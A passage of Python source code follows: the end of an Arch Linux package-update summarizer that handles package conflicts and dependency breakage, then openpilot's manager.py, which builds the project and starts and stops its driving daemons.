to_install_srcs = {p for p, data in context.pkgs_data.items() if data['d'] and to_install in data['d']}
if to_update not in context.cannot_upgrade:
srcs_str = ', '.join(("'{}'".format(p) for p in to_install_srcs))
reason = self.i18n['arch.update_summary.to_update.conflicts_dep'].format("'{}'".format(to_install),
srcs_str)
context.cannot_upgrade[to_install] = UpgradeRequirement(context.to_update[to_update], reason)
if to_update in context.to_update:
del context.to_update[to_update]
for src_pkg in to_install_srcs:
src_to_install = src_pkg in context.to_install
pkg = context.to_install[src_pkg] if src_to_install else context.to_update[src_pkg]
if src_pkg not in context.cannot_upgrade:
reason = self.i18n['arch.update_summary.to_update.dep_conflicts'].format("'{}'".format(to_install),
"'{}'".format(to_update))
context.cannot_upgrade[src_pkg] = UpgradeRequirement(pkg, reason)
if src_to_install:
del context.to_install[src_pkg]
if src_pkg in context.repo_to_install:
del context.repo_to_install[src_pkg]
else:
del context.aur_to_install[src_pkg]
else:
del context.to_update[src_pkg]
if src_pkg in context.repo_to_update:
del context.repo_to_update[src_pkg]
else:
del context.aur_to_update[src_pkg]
del context.pkgs_data[src_pkg]
if to_install in context.to_install:
del context.to_install[to_install]
def _handle_conflict_both_to_update(self, pkg1: str, pkg2: str, context: UpdateRequirementsContext):
if pkg1 not in context.cannot_upgrade:
reason = "{} '{}'".format(self.i18n['arch.info.conflicts with'].capitalize(), pkg2)
context.cannot_upgrade[pkg1] = UpgradeRequirement(pkg=context.to_update[pkg1], reason=reason)
if pkg2 not in context.cannot_upgrade:
reason = "{} '{}'".format(self.i18n['arch.info.conflicts with'].capitalize(), pkg1)
context.cannot_upgrade[pkg2] = UpgradeRequirement(pkg=context.to_update[pkg2], reason=reason)
for p in (pkg1, pkg2):
if p in context.to_update:
del context.to_update[p]
if p in context.repo_to_update:
del context.repo_to_update[p]
else:
del context.aur_to_update[p]
def _filter_and_map_conflicts(self, context: UpdateRequirementsContext) -> Dict[str, str]:
root_conflict = {}
mutual_conflicts = {}
for p, data in context.pkgs_data.items():
if data['c']:
for c in data['c']:
if c and c != p and c in context.installed_names:
# source = provided_map[c]
root_conflict[c] = p
if (p, c) in root_conflict.items():
mutual_conflicts[c] = p
if mutual_conflicts:
for pkg1, pkg2 in mutual_conflicts.items():
pkg1_to_install = pkg1 in context.to_install
pkg2_to_install = pkg2 in context.to_install
if pkg1_to_install and pkg2_to_install: # remove both from to install and mark their source packages as 'cannot_update'
self._handle_conflict_both_to_install(pkg1, pkg2, context)
elif (pkg1_to_install and not pkg2_to_install) or (not pkg1_to_install and pkg2_to_install):
self._handle_conflict_to_update_and_to_install(pkg1, pkg2, pkg1_to_install, context)
else:
self._handle_conflict_both_to_update(pkg1, pkg2, context) # adding both to the 'cannot update' list
for pkg1, pkg2 in mutual_conflicts.items(): # removing conflicting packages from the packages selected to upgrade
for p in (pkg1, pkg2):
if p in context.pkgs_data:
if context.pkgs_data[p].get('c'):
for c in context.pkgs_data[p]['c']:
# source = provided_map[c]
if c in root_conflict:
del root_conflict[c]
del context.pkgs_data[p]
return root_conflict
def _fill_conflicts(self, context: UpdateRequirementsContext, blacklist: Iterable[str] = None):
self.logger.info("Checking conflicts")
root_conflict = self._filter_and_map_conflicts(context)
if root_conflict:
for dep, source in root_conflict.items():
if dep not in context.to_remove and (not blacklist or dep not in blacklist):
req = ArchPackage(name=dep, installed=True, i18n=self.i18n)
reason = "{} '{}'".format(self.i18n['arch.info.conflicts with'].capitalize(), source)
context.to_remove[dep] = UpgradeRequirement(req, reason)
def _map_and_add_package(self, pkg_data: Tuple[str, str], idx: int, output: dict):
version = None
if pkg_data[1] == 'aur':
try:
info = self.aur_client.get_src_info(pkg_data[0])
if info:
version = info.get('pkgver')
if not version:
self.logger.warning("No version declared in SRCINFO of '{}'".format(pkg_data[0]))
else:
self.logger.warning("Could not retrieve the SRCINFO for '{}'".format(pkg_data[0]))
except:
self.logger.warning("Could not retrieve the SRCINFO for '{}'".format(pkg_data[0]))
else:
version = pacman.get_version_for_not_installed(pkg_data[0])
output[idx] = ArchPackage(name=pkg_data[0], version=version, latest_version=version, repository=pkg_data[1], i18n=self.i18n)
def _fill_to_install(self, context: UpdateRequirementsContext) -> bool:
ti = time.time()
self.logger.info("Discovering updates missing packages")
deps_data, deps_checked = {}, set()
deps = self.deps_analyser.map_missing_deps(pkgs_data=context.pkgs_data,
provided_map=context.provided_map,
aur_index=context.aur_index,
deps_checked=deps_checked,
sort=True,
deps_data=deps_data,
remote_provided_map=context.remote_provided_map,
remote_repo_map=context.remote_repo_map,
watcher=self.watcher,
automatch_providers=context.arch_config['automatch_providers'])
if deps is None:
tf = time.time()
self.logger.info("It took {0:.2f} seconds to retrieve required upgrade packages".format(tf - ti))
return False # the user called the process off
if deps: # filtering selected packages
selected_names = {p for p in context.to_update}
deps = [dep for dep in deps if dep[0] not in selected_names]
if deps:
sorted_pkgs = {}
aur_to_install_data = {}
all_to_install_data = {}
for idx, dep in enumerate(deps):
data = deps_data[dep[0]]
pkg = ArchPackage(name=dep[0], version=data['v'], latest_version=data['v'], repository=dep[1], i18n=self.i18n, package_base=data.get('b', dep[0]))
sorted_pkgs[idx] = pkg
context.to_install[dep[0]] = pkg
if pkg.repository == 'aur':
context.aur_to_install[pkg.name] = pkg
aur_to_install_data[pkg.name] = data
else:
context.repo_to_install[pkg.name] = pkg
if context.repo_to_install:
all_to_install_data.update(pacman.map_updates_data(context.repo_to_install.keys()))
if aur_to_install_data:
all_to_install_data.update(aur_to_install_data)
if all_to_install_data:
context.pkgs_data.update(all_to_install_data)
self._fill_conflicts(context, context.to_remove.keys())
if context.to_install:
self.__fill_provided_map(context=context, pkgs=context.to_install, fill_installed=False)
tf = time.time()
self.logger.info("It took {0:.2f} seconds to retrieve required upgrade packages".format(tf - ti))
return True
def __fill_provided_map(self, context: UpdateRequirementsContext, pkgs: Dict[str, ArchPackage], fill_installed: bool = True):
if pkgs:
ti = time.time()
self.logger.info("Filling provided names")
if not context.installed_names:
context.installed_names = pacman.list_installed_names()
installed_to_ignore = set()
for pkgname in pkgs:
pacman.fill_provided_map(pkgname, pkgname, context.provided_map)
if fill_installed:
installed_to_ignore.add(pkgname)
pdata = context.pkgs_data.get(pkgname)
if pdata and pdata['p']:
pacman.fill_provided_map('{}={}'.format(pkgname, pdata['v']), pkgname, context.provided_map)
ver_split = pdata['v'].split('-')
if len(ver_split) > 1:
pacman.fill_provided_map('{}={}'.format(pkgname, '-'.join(ver_split[0:-1])), pkgname, context.provided_map)
for p in pdata['p']:
pacman.fill_provided_map(p, pkgname, context.provided_map)
split_provided = p.split('=')
if len(split_provided) > 1 and split_provided[0] != p:
pacman.fill_provided_map(split_provided[0], pkgname, context.provided_map)
if installed_to_ignore: # filling the provided names of the installed
installed_to_query = context.installed_names.difference(installed_to_ignore)
if installed_to_query:
context.provided_map.update(pacman.map_provided(remote=False, pkgs=installed_to_query))
tf = time.time()
self.logger.info("Filling provided names took {0:.2f} seconds".format(tf - ti))
def __fill_aur_index(self, context: UpdateRequirementsContext):
if context.aur_supported:
self.logger.info("Loading AUR index")
names = self.aur_client.read_index()
if names:
context.aur_index.update(names)
self.logger.info("AUR index loaded on the context")
def _map_requirement(self, pkg: ArchPackage, context: UpdateRequirementsContext, installed_sizes: Dict[str, int] = None, to_install: bool = False, to_sync: Set[str] = None) -> UpgradeRequirement:
requirement = UpgradeRequirement(pkg)
if pkg.repository != 'aur':
pkgdata = context.pkgs_data.get(pkg.name)
if pkgdata:
requirement.required_size = pkgdata['ds']
requirement.extra_size = pkgdata['s']
current_size = installed_sizes.get(pkg.name) if installed_sizes else None
if current_size is not None and pkgdata['s']:
requirement.extra_size = pkgdata['s'] - current_size
required_by = set()
if to_install and to_sync and context.pkgs_data:
names = pkgdata.get('p', {pkg.name}) if pkgdata else {pkg.name}
to_sync_deps_cache = {}
for p in to_sync:
if p != pkg.name and p in context.pkgs_data:
deps = to_sync_deps_cache.get(p)
if deps is None:
deps = context.pkgs_data[p]['d']
if deps is None:
deps = set()
else:
deps = {RE_DEP_OPERATORS.split(d)[0] for d in deps}
to_sync_deps_cache[p] = deps
if deps:
for n in names:
if n in deps:
required_by.add(p)
break
requirement.reason = '{}: {}'.format(self.i18n['arch.info.required by'].capitalize(), ','.join(required_by) if required_by else '?')
return requirement
def summarize(self, pkgs: List[ArchPackage], root_password: str, arch_config: dict) -> UpgradeRequirements:
res = UpgradeRequirements([], [], [], [])
remote_provided_map = pacman.map_provided(remote=True)
remote_repo_map = pacman.map_repositories()
context = UpdateRequirementsContext(to_update={}, repo_to_update={}, aur_to_update={}, repo_to_install={},
aur_to_install={}, to_install={}, pkgs_data={}, cannot_upgrade={},
to_remove={}, installed_names=set(), provided_map={}, aur_index=set(),
arch_config=arch_config, root_password=root_password,
remote_provided_map=remote_provided_map, remote_repo_map=remote_repo_map,
aur_supported=self.aur_supported)
self.__fill_aur_index(context)
aur_data = {}
aur_srcinfo_threads = []
for p in pkgs:
context.to_update[p.name] = p
if p.repository == 'aur':
context.aur_to_update[p.name] = p
t = Thread(target=self._fill_aur_pkg_update_data, args=(p, aur_data), daemon=True)
t.start()
aur_srcinfo_threads.append(t)
else:
context.repo_to_update[p.name] = p
if context.aur_to_update:
for t in aur_srcinfo_threads:
t.join()
self.logger.info("Filling updates data")
if context.repo_to_update:
context.pkgs_data.update(pacman.map_updates_data(context.repo_to_update.keys()))
if aur_data:
context.pkgs_data.update(aur_data)
self.__fill_provided_map(context=context, pkgs=context.to_update)
if context.pkgs_data:
self._fill_conflicts(context)
try:
if not self._fill_to_install(context):
self.logger.info("The operation was cancelled by the user")
return
except PackageNotFoundException as e:
self.logger.error("Package '{}' not found".format(e.name))
return
if context.pkgs_data:
self._fill_dependency_breakage(context)
self.__update_context_based_on_to_remove(context)
if context.to_update:
installed_sizes = pacman.get_installed_size(list(context.to_update.keys()))
sorted_pkgs = []
if context.repo_to_update: # only sorting by name ( pacman already knows the best order to perform the upgrade )
sorted_pkgs.extend(context.repo_to_update.values())
sorted_pkgs.sort(key=lambda pkg: pkg.name)
if context.aur_to_update: # adding AUR packages in the end
sorted_aur = sorting.sort(context.aur_to_update.keys(), context.pkgs_data, context.provided_map)
for aur_pkg in sorted_aur:
sorted_pkgs.append(context.aur_to_update[aur_pkg[0]])
res.to_upgrade = [self._map_requirement(pkg, context, installed_sizes) for pkg in sorted_pkgs]
if context.to_remove:
res.to_remove = [p for p in context.to_remove.values()]
if context.cannot_upgrade:
res.cannot_upgrade = [d for d in context.cannot_upgrade.values()]
if context.to_install:
to_sync = {r.pkg.name for r in res.to_upgrade} if res.to_upgrade else {}
to_sync.update(context.to_install.keys())
res.to_install = [self._map_requirement(p, context, to_install=True, to_sync=to_sync) for p in context.to_install.values()]
res.context['data'] = context.pkgs_data
return res
def __update_context_based_on_to_remove(self, context: UpdateRequirementsContext):
if context.to_remove:
to_remove_provided = {}
# filtering all package to synchronization from the transaction context
to_sync = {*(context.to_update.keys() if context.to_update else set()), *(context.to_install.keys() if context.to_install else set())}
if to_sync: # checking if any packages to sync on the context rely on the 'to remove' ones
to_remove_provided.update(pacman.map_provided(remote=False, pkgs=context.to_remove.keys()))
to_remove_from_sync = {} # will store all packages that should be removed
for pname in to_sync:
if pname in context.pkgs_data:
deps = context.pkgs_data[pname].get('d')
if deps:
required = set()
for pkg in context.to_remove:
for provided in to_remove_provided[pkg]:
if provided in deps:
required.add(pkg)
break
if required:
to_remove_from_sync[pname] = required
else:
self.logger.warning("Conflict resolution: package '{}' marked to synchronization has no data loaded")
if to_remove_from_sync: # removing all these packages and their dependents from the context
self._add_to_remove(to_sync, to_remove_from_sync, context)
# checking if the installed packages that are not in the transaction context rely on the current packages to be removed:
current_to_remove = {*context.to_remove.keys()}
required_by_installed = self.deps_analyser.map_all_required_by(current_to_remove, {*to_sync})
if required_by_installed:
# updating provided context:
provided_not_mapped = set()
for pkg in current_to_remove.difference({*to_remove_provided.keys()}):
if pkg not in context.pkgs_data:
provided_not_mapped.add(pkg)
else:
provided = context.pkgs_data[pkg].get('p')
if provided:
to_remove_provided[pkg] = provided
else:
provided_not_mapped.add(pkg)
if provided_not_mapped:
to_remove_provided.update(pacman.map_provided(remote=False, pkgs=provided_not_mapped))
deps_no_data = {dep for dep in required_by_installed if dep in context.pkgs_data}
deps_nodata_deps = pacman.map_required_dependencies(*deps_no_data) if deps_no_data else {}
reverse_to_remove_provided = {p: name for name, provided in to_remove_provided.items() for p in provided}
for pkg in required_by_installed:
if pkg not in context.to_remove:
if pkg in context.pkgs_data:
dep_deps = context.pkgs_data[pkg].get('d')
else:
dep_deps = deps_nodata_deps.get(pkg)
if dep_deps:
source = ', '.join((reverse_to_remove_provided[d] for d in dep_deps if d in reverse_to_remove_provided))
reason = "{} '{}'".format(self.i18n['arch.info.depends on'].capitalize(), source if source else '?')
context.to_remove[pkg] = UpgradeRequirement(pkg=ArchPackage(name=pkg,
installed=True,
i18n=self.i18n),
reason=reason)
for name in context.to_remove: # upgrading lists
if name in context.pkgs_data:
del context.pkgs_data[name]
if name in context.aur_to_update:
del context.aur_to_update[name]
if name in context.repo_to_update:
del context.repo_to_update[name]
removed_size = pacman.get_installed_size([*context.to_remove.keys()])
if removed_size:
for name, size in removed_size.items():
if size is not None:
req = context.to_remove.get(name)
if req:
req.extra_size = size
def _add_to_remove(self, pkgs_to_sync: Set[str], names: Dict[str, Set[str]], context: UpdateRequirementsContext, to_ignore: Set[str] = None):
blacklist = to_ignore if to_ignore else set()
blacklist.update(names)
dependents = {}
for pname in pkgs_to_sync:
if pname not in blacklist:
data = context.pkgs_data.get(pname)
if data:
deps = data.get('d')
if deps:
for n in names:
if n in deps:
all_deps = dependents.get(n, set())
all_deps.update(pname)
dependents[n] = all_deps
else:
self.logger.warning("Package '{}' to sync could not be removed from the transaction context because its data was not loaded")
for n in names:
if n in context.pkgs_data:
if n not in context.to_remove:
depends_on = names.get(n)
if depends_on:
reason = "{} '{}'".format(self.i18n['arch.info.depends on'].capitalize(), ', '.join(depends_on))
else:
reason = '?'
context.to_remove[n] = UpgradeRequirement(pkg=ArchPackage(name=n,
installed=True,
i18n=self.i18n),
reason=reason)
all_deps = dependents.get(n)
if all_deps:
self._add_to_remove(pkgs_to_sync, {dep: {n} for dep in all_deps}, context, blacklist)
else:
self.logger.warning("Package '{}' could not be removed from the transaction context because its data was not loaded")
def _fill_dependency_breakage(self, context: UpdateRequirementsContext):
if bool(context.arch_config['check_dependency_breakage']) and (context.to_update or context.to_install):
ti = time.time()
self.logger.info("Begin: checking dependency breakage")
required_by = pacman.map_required_by(context.to_update.keys()) if context.to_update else {}
if context.to_install:
required_by.update(pacman.map_required_by(context.to_install.keys(), remote=True))
reqs_not_in_transaction = set()
reqs_in_transaction = set()
transaction_pkgs = {*context.to_update.keys(), *context.to_install.keys()}
for reqs in required_by.values():
for r in reqs:
if r in transaction_pkgs:
reqs_in_transaction.add(r)
elif r in context.installed_names:
reqs_not_in_transaction.add(r)
if not reqs_not_in_transaction and not reqs_in_transaction:
return
provided_versions = {}
for p in context.provided_map:
pkg_split = p.split('=')
if len(pkg_split) > 1:
versions = provided_versions.get(pkg_split[0])
if versions is None:
versions = set()
provided_versions[pkg_split[0]] = versions
versions.add(pkg_split[1])
if not provided_versions:
return
cannot_upgrade = set()
for pkg, deps in pacman.map_required_dependencies(*reqs_not_in_transaction).items():
self._add_dependency_breakage(pkgname=pkg,
pkgdeps=deps,
provided_versions=provided_versions,
cannot_upgrade=cannot_upgrade,
context=context)
for pkg in reqs_in_transaction:
data = context.pkgs_data[pkg]
if data and data['d']:
self._add_dependency_breakage(pkgname=pkg,
pkgdeps=data['d'],
provided_versions=provided_versions,
cannot_upgrade=cannot_upgrade,
context=context)
if cannot_upgrade:
cannot_upgrade.update(self._add_dependents_as_cannot_upgrade(context=context,
names=cannot_upgrade,
pkgs_available={*context.to_update.values(), *context.to_install.values()}))
for p in cannot_upgrade:
if p in context.to_update:
del context.to_update[p]
if p in context.repo_to_update:
del context.repo_to_update[p]
if p in context.aur_to_update:
del context.aur_to_update[p]
if p in context.pkgs_data:
del context.pkgs_data[p]
if p in context.to_install:
del context.to_install[p]
if p in context.repo_to_install:
del context.repo_to_install[p]
if p in context.aur_to_install:
del context.aur_to_install[p]
tf = time.time()
self.logger.info("End: checking dependency breakage. Time: {0:.2f} seconds".format(tf - ti))
def _add_dependents_as_cannot_upgrade(self, context: UpdateRequirementsContext, names: Iterable[str], pkgs_available: Set[ArchPackage], already_removed: Optional[Set[str]] = None, iteration_level: int = 0) -> Set[str]:
removed = set() if already_removed is None else already_removed
removed.update(names)
available = {p for p in pkgs_available if p.name not in removed}
to_remove = set()
if available:
for pkg in available:
if pkg.name not in removed:
data = context.pkgs_data.get(pkg.name)
if data and data['d']:
for dep in data['d']:
dep_providers = context.provided_map.get(dep)
if dep_providers:
for p in dep_providers:
if p in names:
to_remove.add(pkg.name)
if pkg.name not in context.cannot_upgrade:
reason = "{} {}".format(self.i18n['arch.info.depends on'].capitalize(), p)
context.cannot_upgrade[pkg.name] = UpgradeRequirement(pkg=pkg,
reason=reason,
sorting_priority=iteration_level - 1)
break
if to_remove:
removed.update(to_remove)
self._add_dependents_as_cannot_upgrade(context=context, names=to_remove, pkgs_available=available,
already_removed=to_remove, iteration_level=iteration_level-1)
return to_remove
def _add_dependency_breakage(self, pkgname: str, pkgdeps: Optional[Set[str]], provided_versions: Dict[str, Set[str]], cannot_upgrade: Set[str], context: UpdateRequirementsContext):
if pkgdeps:
for dep in pkgdeps:
dep_split = RE_DEP_OPERATORS.split(dep)
if len(dep_split) > 1 and dep_split[1]:
real_providers = context.provided_map.get(dep_split[0])
if real_providers:
versions = provided_versions.get(dep_split[0])
if versions:
op = ''.join(RE_DEP_OPERATORS.findall(dep))
if op == '=':
op = '=='
version_match = False
for v in versions:
try:
provided_version, required_version = parse_version(v), parse_version(dep_split[1])
if eval('provided_version {} required_version'.format(op)):
version_match = True
break
except:
self.logger.error("Error when comparing versions {} (provided) and {} (required)".format(v, dep_split[1]))
traceback.print_exc()
if not version_match:
for pname in real_providers:
if pname not in cannot_upgrade:
provider = context.to_update.get(pname)
if provider:
cannot_upgrade.add(pname)
reason = self.i18n['arch.sync.dep_breakage.reason'].format(pkgname, dep)
context.cannot_upgrade[pname] = UpgradeRequirement(pkg=provider,
reason=reason)
|
manager.py
|
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR, PARAMS
from common.android import ANDROID
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1140
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
if __name__ == "__main__" and ANDROID:
from common.spinner import Spinner
from common.text_window import TextWindow
else:
from common.spinner import FakeSpinner as Spinner
from common.text_window import FakeTextWindow as TextWindow
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common import android
from common.apk import update_apks, pm_apply_packages, start_offroad
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"driverview": "selfdrive.monitoring.driverview",
"appd": "selfdrive.kyd.appd.appd",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord', 'paramsd']
# processes to end if thermal conditions exceed Green parameters
green_temp_processes = ['uploader']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
]
if ANDROID:
persistent_processes += [
'logcatd',
'tombstoned',
'updated',
'deleter',
'appd',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'dmonitoringd',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'ubloxd',
'locationd',
]
if WEBCAM:
car_started_processes += [
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'sensord',
'clocksd',
'gpsd',
'dmonitoringmodeld',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
if ANDROID:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
params = Params()
EnableLogger = int(params.get('OpkrEnableLogger'))
#EnableLogger = (params.get("RecordFront") != b"0")
if not EnableLogger:
car_started_processes.remove( 'loggerd' )
persistent_processes.remove( 'logmessaged' )
persistent_processes.remove( 'uploader' )
persistent_processes.remove( 'logcatd' )
persistent_processes.remove( 'updated' )
persistent_processes.remove( 'deleter' )
persistent_processes.remove( 'tombstoned' )
else:
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
